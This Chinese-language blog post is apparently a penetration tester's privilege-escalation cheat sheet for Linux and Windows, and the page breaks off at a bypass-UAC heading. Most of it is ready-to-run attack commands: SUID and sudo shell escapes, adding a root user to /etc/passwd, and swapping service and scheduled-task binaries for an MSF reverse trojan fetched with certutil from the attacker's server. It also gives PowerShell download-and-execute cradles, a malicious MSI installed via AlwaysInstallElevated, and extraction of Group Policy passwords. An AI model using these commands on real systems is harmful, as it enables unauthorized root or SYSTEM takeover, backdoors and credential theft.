

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/sss.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Quinn">
  <meta name="keywords" content="">
  
    <meta name="description" content="Linux内核溢出漏洞提权脏牛提权 1.uname -a 查看内核版本2.searchsploit 内核版本3.上传提权文件4.cat .c文件，查看编译命令5.gcc -pthread 40839.c -o 40839 -lcrypt6.执行脚本  使用工具进行漏洞检测[linux-exploit-suggester、linux-exploit-suggester-2] 上传自动搜索提权漏洞的脚">
<meta property="og:type" content="article">
<meta property="og:title" content="提权">
<meta property="og:url" content="http://15555553535.github.io/2023/04/23/%E6%8F%90%E6%9D%83/index.html">
<meta property="og:site_name" content="3e7en">
<meta property="og:description" content="Linux内核溢出漏洞提权脏牛提权 1.uname -a 查看内核版本2.searchsploit 内核版本3.上传提权文件4.cat .c文件，查看编译命令5.gcc -pthread 40839.c -o 40839 -lcrypt6.执行脚本  使用工具进行漏洞检测[linux-exploit-suggester、linux-exploit-suggester-2] 上传自动搜索提权漏洞的脚">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2023-04-23T02:55:11.000Z">
<meta property="article:modified_time" content="2023-04-24T01:39:10.037Z">
<meta property="article:author" content="Quinn">
<meta property="article:tag" content="权限提升">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>提权 - 3e7en</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="/css/123.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"15555553535.github.io","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Quinn&#39;s Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="提权"></span>
          
        </div>

        
          
  <div class="mt-3">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-author" aria-hidden="true"></i>
        Quinn
      </span>
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-04-23 10:55" pubdate>
          2023年4月23日 上午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          9.6k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          81 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">提权</h1>
            
              <p class="note note-info">
                
                  
                    本文最后更新于：2023年4月24日 上午
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <h1 id="Linux"><a href="#Linux" class="headerlink" title="Linux"></a>Linux</h1><h3 id="内核溢出漏洞提权"><a href="#内核溢出漏洞提权" class="headerlink" title="内核溢出漏洞提权"></a>内核溢出漏洞提权</h3><h5 id="脏牛提权"><a href="#脏牛提权" class="headerlink" title="脏牛提权"></a>脏牛提权</h5><blockquote>
<p>1.uname -a 查看内核版本<br>2.searchsploit 内核版本<br>3.上传提权文件<br>4.cat .c文件，查看编译命令<br>5.gcc -pthread 40839.c -o 40839 -lcrypt<br>6.执行脚本</p>
</blockquote>
<h5 id="使用工具进行漏洞检测-linux-exploit-suggester、linux-exploit-suggester-2"><a href="#使用工具进行漏洞检测-linux-exploit-suggester、linux-exploit-suggester-2" class="headerlink" title="使用工具进行漏洞检测[linux-exploit-suggester、linux-exploit-suggester-2]"></a>使用工具进行漏洞检测[linux-exploit-suggester、linux-exploit-suggester-2]</h5><blockquote>
<p>上传自动搜索提权漏洞的脚本: <a target="_blank" rel="noopener" href="https://github.com/mzet-/linux-exploit-suggester">https://github.com/mzet-/linux-exploit-suggester</a><br><a target="_blank" rel="noopener" href="https://github.com/jondonas/linux-exploit-suggester-2">https://github.com/jondonas/linux-exploit-suggester-2</a></p>
</blockquote>
<h3 id="SUID提权"><a href="#SUID提权" class="headerlink" title="SUID提权"></a>SUID提权</h3><blockquote>
<p>SUID可以让调用者以文件拥有者的身份运行该文件,即运行root用户所拥有的的SUID文件</p>
</blockquote>
<h5 id="find提权"><a href="#find提权" class="headerlink" title="find提权"></a>find提权</h5><blockquote>
<ol>
<li>find &#x2F; -perm -u&#x3D;s -type f 2&gt;&#x2F;dev&#x2F;null #查找系统运行的所有的SUID可执行文件</li>
<li>find &#x2F;etc&#x2F;passwd -exec &#x2F;bin&#x2F;bash -p ;</li>
</ol>
</blockquote>
<h5 id="vim提权"><a href="#vim提权" class="headerlink" title="vim提权"></a>vim提权</h5><blockquote>
<p>1.vim.tiny &#x2F;etc&#x2F;shadow<br>2.:set shell&#x3D;&#x2F;bin&#x2F;sh<br>3.:shell</p>
</blockquote>
<h5 id="bash提权"><a href="#bash提权" class="headerlink" title="bash提权"></a>bash提权</h5><blockquote>
<p>1.bash -p</p>
</blockquote>
<h5 id="less、more提权"><a href="#less、more提权" class="headerlink" title="less、more提权"></a>less、more提权</h5><blockquote>
<p>1.less &#x2F;etc&#x2F;passwd<br>2.!&#x2F;bin&#x2F;sh</p>
</blockquote>
<h5 id="计划任务提权"><a href="#计划任务提权" class="headerlink" title="计划任务提权"></a>计划任务提权</h5><blockquote>
<p>1.ls -l &#x2F;etc&#x2F;cron*<br>2.cat &#x2F;etc&#x2F;crontab<br>3.权限配置不当导致权限的提升<br>4.查看是否有777权限的文件在任务计划中<br>5.修改文件内容<br>6.等待计划任务的执行</p>
</blockquote>
<h3 id="Sudo滥用提权"><a href="#Sudo滥用提权" class="headerlink" title="Sudo滥用提权"></a>Sudo滥用提权</h3><blockquote>
<p>sudo -l 查看当前用户允许使用的命令</p>
</blockquote>
<h5 id="awk"><a href="#awk" class="headerlink" title="awk"></a>awk</h5><blockquote>
<p>sudo awk ‘BEGIN{system(“&#x2F;bin&#x2F;bash”)}’</p>
</blockquote>
<h5 id="find"><a href="#find" class="headerlink" title="find"></a>find</h5><blockquote>
<p>sudo find &#x2F;home -exec &#x2F;bin&#x2F;bash ;</p>
</blockquote>
<h5 id="cat"><a href="#cat" class="headerlink" title="cat"></a>cat</h5><blockquote>
<p>sudo cat &#x2F;etc&#x2F;shadow</p>
</blockquote>
<h5 id="zip"><a href="#zip" class="headerlink" title="zip"></a>zip</h5><blockquote>
<p>touch 1.txt<br>sudo zip 1.zip 1.txt -T –unzip-command&#x3D;”sh -c &#x2F;bin&#x2F;bash”</p>
</blockquote>
<h5 id="git"><a href="#git" class="headerlink" title="git"></a>git</h5><blockquote>
<p>sudo git help add<br>!&#x2F;bin&#x2F;bash</p>
</blockquote>
<h5 id="ed"><a href="#ed" class="headerlink" title="ed"></a>ed</h5><blockquote>
<p>sudo ed<br>!&#x2F;bin&#x2F;sh</p>
</blockquote>
<h3 id="x2F-etc-x2F-passwd文件配置错误提权"><a href="#x2F-etc-x2F-passwd文件配置错误提权" class="headerlink" title="&#x2F;etc&#x2F;passwd文件配置错误提权"></a>&#x2F;etc&#x2F;passwd文件配置错误提权</h3><blockquote>
<p>查看当前用户是否有读写权限<br>perl -le ‘print crypt(“123456”,”addedsalt”)’	#生成带有盐值的密码<br>echo “test:adrla7IBSfTZQ:0:0:root:&#x2F;root:&#x2F;bin&#x2F;bash” &gt;&gt;&#x2F;etc&#x2F;passwd 	#创建一个用户test且密码为123456</p>
</blockquote>
<h1 id="Windows"><a href="#Windows" class="headerlink" title="Windows"></a>Windows</h1><h3 id="系统内核溢出漏洞提权"><a href="#系统内核溢出漏洞提权" class="headerlink" title="系统内核溢出漏洞提权"></a>系统内核溢出漏洞提权</h3><blockquote>
<p>利用系统本身存在的一些系统内核溢出漏洞没有打补丁，或者对比systeminfo信息中的补丁信息来查找确实的补丁号，通过补丁号对照对应的系统版本查找对应可以提升权限的exp</p>
</blockquote>
<h4 id="补丁查找方法"><a href="#补丁查找方法" class="headerlink" title="补丁查找方法"></a>补丁查找方法</h4><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs SHELL"><span class="hljs-meta prompt_">#</span><span class="language-bash">手工查找</span><br>	systeminfo<br>	Wmic qfe get Caption,Description,HotFixID,InstalledOn<br><span class="hljs-meta prompt_">	</span><br><span class="hljs-meta prompt_">#</span><span class="language-bash">MSF后渗透扫描</span><br>	post/windows/gather/enum_patches<br>	post/multi/recon/local_exploit_suggester<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">#</span><span class="language-bash">windows exploit suggester</span><br>	https://github.com/AonCyberLabs/Windows-Exploit-Suggester<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">#</span><span class="language-bash">powershell中的sherlock脚本</span><br>	Import-Module C:\Sherlock.ps1 #下载ps1脚本，导入模块<br>	Find-AllVulns<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">#</span><span class="language-bash">Empire内置模块 Empire框架也提供了关于内核溢出漏洞提权的漏洞利用方法</span><br>	usemodule privesc/powerup/allchecks<br>	execute	<br></code></pre></td></tr></table></figure>
<h4 id="版本对应的exp"><a href="#版本对应的exp" class="headerlink" title="版本对应的exp"></a>版本对应的exp</h4><blockquote>
<p><a target="_blank" rel="noopener" href="https://github.com/SecWiki/windows-kernel-exploits">https://github.com/SecWiki/windows-kernel-exploits</a><br><a target="_blank" rel="noopener" href="https://bugs.hacking8.com/tiquan/">https://bugs.hacking8.com/tiquan/</a><br><a target="_blank" rel="noopener" href="https://github.com/Heptagrams/Heptagram/tree/master/Windows/Elevation">https://github.com/Heptagrams/Heptagram/tree/master/Windows/Elevation</a><br><a target="_blank" rel="noopener" href="https://www.exploit-db.com/">https://www.exploit-db.com/</a><br><a target="_blank" rel="noopener" href="https://i.hacking8.com/tiquan/">https://i.hacking8.com/tiquan/</a></p>
</blockquote>
<h3 id="系统配置错误提权"><a href="#系统配置错误提权" class="headerlink" title="系统配置错误提权"></a>系统配置错误提权</h3><h4 id="权限配置错误"><a href="#权限配置错误" class="headerlink" title="权限配置错误"></a>权限配置错误</h4><blockquote>
<p>Windows系统服务文件在操作系统启动时加载和运行，并在后台调用可执行文件<br>系统服务权限配置错误利用有如下两种方式：服务未启动：攻击者可以使用任意服务替换原来的服务，然后重启服务;服务正在运行且无法被终止：这种情况符合绝大多数的漏洞利用场景，攻击者通常会利用dll劫持技术并尝试重启服务来提权(需要administrtor权限)</p>
</blockquote>
<h5 id="查找错误配置"><a href="#查找错误配置" class="headerlink" title="查找错误配置"></a>查找错误配置</h5><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs SHELL"><span class="hljs-meta prompt_">#</span><span class="language-bash">powerup提供了一些本地提权的方法，可以通过很多实用的脚本来寻找目标机器的windows服务漏洞</span><br>https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp<br>可直接通过powershell远程加载<br>	powershell -nop -exec bypass -c &quot;IEX (New-Object Net.WebClient).DownloadString(&#x27;https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1&#x27;); Invoke-AllChecks&quot;<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">#</span><span class="language-bash">msf 对应的模块为exploit/windows/local/service_permissions  但前提是获得一个会话</span><br>	run exploit/windows/local/service_permissions #自动化提权，回来的的权限就是system<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">#</span><span class="language-bash">当工具无法使用时，也可以手工查找，使用Windows内建工具icacls查看服务启动路径中写权限</span><br>	例如：icacls “C:\Program Files”<br>	icacls “C:\Program Files\Common Files”<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">#</span><span class="language-bash">查看指定目录的权限配置情况</span><br>	accesschk.exe -dqv &quot;D:\test&quot; -accepteula<br>参数说明：“M”表示修改，“F”代表完全控制，“CI”代表从属容器将继承访问控制项，“OI”代表从属文件将继承访问控制项。<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">#</span><span class="language-bash">检查服务 如果是.SERVICE_ALL_ACCESS的意思是我们对“Vulnerable Service”的属性拥有完全控制权</span><br>	accesschk.exe -uwcqv &quot;Authenticated Users&quot; * /accepteula<br>	sc qc 服务名   #查看可以完全控制的服务的属性<br><span class="hljs-meta prompt_">	</span><br><span class="hljs-meta prompt_">#</span><span class="language-bash">schtask 查询</span><br>	schtasks /query /fo LIST 2&gt;nul<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">#</span><span class="language-bash">powershell</span><br>	Get-ScheduledTask<br></code></pre></td></tr></table></figure>

<h5 id="利用方式"><a href="#利用方式" class="headerlink" title="利用方式"></a>利用方式</h5><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><code class="hljs SHELL"><span class="hljs-meta prompt_">#</span><span class="language-bash">把服务启动的行为（exe或者脚本，com组件..）替换成我们的MSF反弹木马，当服务重启时，就会给我们返回一个system权限的meterpreter</span><br>	set AutoRunScript migrate -f#正常接收到会话后，不久就会自动断开连接，需要开启命令自动迁移进程<br>为什么要自动迁移？<br>这是因为当一个服务在Windows系统中启动后，它必须和服务控制管理器通信，如果没有通信，服务控制管理器会认为出现了错误，并会终止这个进程，我们所有需要做的就是在终止载荷进程之前，将它迁移到其它进程。<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">	#</span><span class="language-bash">run exploit/windows/local/service_permissions</span><br>	run exploit/windows/local/service_permissions<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">#</span><span class="language-bash">找到我们具有完全控制权限的服务，修改服务配置执行命令</span><br>	sc config 服务名 binpath = &quot;木马程序.exe&quot;   #INARY_PATH_NAME参数指向了该服务的可执行程序<br>	sc stop 服务名<br>	sc start 服务名<br><span class="hljs-meta prompt_">	</span><br><span class="hljs-meta prompt_">#</span><span class="language-bash">进行筛选 删除包含/Microsoft/Windows/路径的所有任务</span><br>	Get-ScheduledTask | Select * | ? &#123;($_.TaskPath -notlike &quot;\Microsoft\Windows\*&quot;) -And ($_.Principal.UserId -notlike &quot;*$env:UserName*&quot;)&#125; | Format-Table -Property State, Actions, Date, TaskPath, TaskName, @&#123;Name=&quot;User&quot;;Expression=&#123;$_.Principal.userID&#125;&#125;<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">#</span><span class="language-bash">分析计划任务  查找行为，比如exe，脚本什么的</span><br><span class="hljs-meta prompt_">	$</span><span class="language-bash">task= Get-ScheduledTask -TaskName 计划任务名</span> <br>	ForEach ($triger in $task.Triggers) &#123; echo $triger.Repetition.Interval&#125;<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">#</span><span class="language-bash">查找计划任务行为所在目录，低权限用户是否具有可写权限  accesschk.exe  当然也可以用icacls命令</span><br>	accesschk64.exe -accepteula -wv lowuser C:\ScheduledTasks\Task1\1111.exe<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">#</span><span class="language-bash">直接替换</span><br>	certutil -urlcache -split -f &quot;http://你的vps/1111.exe&quot; C:\ScheduledTasks\Task1\1111.exe<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">#</span><span class="language-bash">等待计划任务执行</span><br><br>这里可以用木马程序可以用exe，任意脚本，dll文件等等，具体情况具体分析<br></code></pre></td></tr></table></figure>

<h4 id="可信任服务路径漏洞"><a href="#可信任服务路径漏洞" class="headerlink" title="可信任服务路径漏洞"></a>可信任服务路径漏洞</h4><blockquote>
<p>服务的可执行文件的路径没有双引号且包含空格,Windows会尝试寻找并执行名字与空格前的名字匹配的程序</p>
</blockquote>
<h5 id="检测"><a href="#检测" class="headerlink" title="检测"></a>检测</h5><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs SHELL"><span class="hljs-meta prompt_">#</span><span class="language-bash">wmi查找含有漏洞的服务命令</span><br>	wmic service get name,displayname,pathname,startmode|findstr /i &quot;Auto&quot; |findstr /i /v &quot;C:\Windows\\&quot; |findstr/i /v &quot;&quot;&quot;<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">#</span><span class="language-bash">PowerUp脚本</span><br>	https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp<br>	powershell.exe -exec bypass -Command &quot;&amp;&#123;Import-Module .\PowerUp.ps1; Invoke-AllChecks&#125;&quot;<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">#</span><span class="language-bash"><span class="hljs-comment">#查看指定目录的权限配置情况</span></span><br>	accesschk.exe -dqv &quot;D:\test&quot; -accepteula<br></code></pre></td></tr></table></figure>

<h5 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h5><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs SHELL"><span class="hljs-meta prompt_">#</span><span class="language-bash">msf攻击模块</span><br>	exploit/windows/local/trusted_service_path<br>	set AutoRunScript migrate -f<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">#</span><span class="language-bash">手动攻击</span><br>我们需要执行的exe根据需要重命名并放置在可写入的有漏洞目录下<br>然后重启服务<br>	sc stop service_name<br>	sc start service_name<br></code></pre></td></tr></table></figure>

<h4 id="不安全的注册表权限配置"><a href="#不安全的注册表权限配置" class="headerlink" title="不安全的注册表权限配置"></a>不安全的注册表权限配置</h4><blockquote>
<p>如果低权限用户对”HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Vulnerable Service\服务名\ImagePath”这个键值有写权限即可以控制这个服务</p>
</blockquote>
<h5 id="检测-1"><a href="#检测-1" class="headerlink" title="检测"></a>检测</h5><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs SHELL"><span class="hljs-meta prompt_">#</span><span class="language-bash">微软的工具</span><br>	https://www.microsoft.com/en-us/download/search.aspx?q=subinacl<br>	subinacl.exe /key reg &quot;HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Vulnerable Service\服务名&quot; /display<br></code></pre></td></tr></table></figure>

<h5 id="利用-1"><a href="#利用-1" class="headerlink" title="利用"></a>利用</h5><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs SHELL"><span class="hljs-meta prompt_">#</span><span class="language-bash">如果我们对注册表有写入权限，就可以修改注册表，使得服务启动时运行我们的恶意程序</span><br>	reg add &quot;HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesVulnerable Service360rp&quot; /t REG_EXPAND_SZ /v ImagePath /d &quot;C:programdataadduser.exe&quot; /f<br></code></pre></td></tr></table></figure>

<h4 id="启用注册表键AlwaysInstallElevated"><a href="#启用注册表键AlwaysInstallElevated" class="headerlink" title="启用注册表键AlwaysInstallElevated"></a>启用注册表键AlwaysInstallElevated</h4><blockquote>
<p>AlwaysInstallElevated策略允许用户以System权限运行安装文件</p>
</blockquote>
<h5 id="检测-2"><a href="#检测-2" class="headerlink" title="检测"></a>检测</h5><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs SHELL"><span class="hljs-meta prompt_">#</span><span class="language-bash">PowerUp</span><br>	powershell.exe -exec bypass -Command &quot;&amp; &#123;Import-Module .\PowerUp.ps1;Get-RegistryAlwaysInstallElevated&#125;&quot;<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">#</span><span class="language-bash">当然也可以查看注册表键值是否被定义</span><br>	reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated<br>	reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated<br></code></pre></td></tr></table></figure>

<h5 id="利用-2"><a href="#利用-2" class="headerlink" title="利用"></a>利用</h5><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs SHELL"><span class="hljs-meta prompt_">#</span><span class="language-bash">利用方法,启用AlwaysInstallElevated后，可以通过命令行调用msiexec安装msi文件，msi文件内包含要执行的Payload，Payload将会以System权限执行</span><br>	msiexec /quiet /qn /i muma.msi<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">#</span><span class="language-bash">msf   需要一个会话</span><br>	run exploit/windows/local/always_install_elevated<br></code></pre></td></tr></table></figure>

<h3 id="组策略首选项提权"><a href="#组策略首选项提权" class="headerlink" title="组策略首选项提权"></a>组策略首选项提权</h3><h4 id="SYSVOL"><a href="#SYSVOL" class="headerlink" title="SYSVOL"></a>SYSVOL</h4><blockquote>
<p>AD里面一个存储域公共文件服务器副本的共享文件夹，所有认证用户都可以读取;SYSVOL在所有域控里进行自动同步和共享</p>
</blockquote>
<p><code>\\&lt;DOMAIN&gt;\SYSVOL\&lt;DOMAIN&gt;\Policies\ #所有组策略均存储在如下位置</code></p>
<h4 id="GPP"><a href="#GPP" class="headerlink" title="GPP"></a>GPP</h4><blockquote>
<p>存储和使用凭据</p>
</blockquote>
<h5 id="利用-3"><a href="#利用-3" class="headerlink" title="利用"></a>利用</h5><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs SHELL"><span class="hljs-meta prompt_">#</span><span class="language-bash">Powershell获取cpassword</span><br>	Get-GPPPassword.ps1<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">#</span><span class="language-bash">PowerSploit 的 Get-GPPPassword模块 检索通过组策略首选项推送的帐户的明文密码和其他信息。</span><br>	powershell &quot;IEX (New-Object Net.WebClient).DownloadString(&#x27;https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1&#x27;);Get-GPPPassword&quot;Import-Module .\Get-GPPPassword.ps1;Get-GPPPassword<br>	kali gpp-decrypt命令破解密码<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">#</span><span class="language-bash">Msf</span><br>	run post/windows/gather/credentials/gpp<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">#</span><span class="language-bash">Empire</span><br>	usemodule privesc/gpp<br></code></pre></td></tr></table></figure>

<h3 id="bypassUAC提权"><a href="#bypassUAC提权" class="headerlink" title="bypassUAC提权"></a>bypassUAC提权</h3><blockquote>
